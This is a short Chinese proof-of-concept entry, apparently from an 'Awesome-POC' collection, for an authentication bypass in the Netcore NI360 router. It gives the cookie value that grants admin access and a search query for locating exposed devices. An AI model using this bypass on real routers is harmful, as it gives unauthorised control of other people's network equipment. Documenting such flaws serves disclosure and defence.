Awesome-POC/网络设备漏洞/磊科 NI360路由器 认证绕过漏洞.md
2023-08-28 15:55:36 +08:00

430 B
Raw Blame History

磊科 NI360路由器 认证绕过漏洞

漏洞描述

磊科 NI360路由器 存在认证绕过漏洞通过添加特定的Cookie字段获取后台权限

漏洞影响

磊科 NI360路由器

网络测绘

title="Netcore"

漏洞描述

登录页面如下

添加 Cookie字段 : netcore_login=guest:1

刷新后登录后台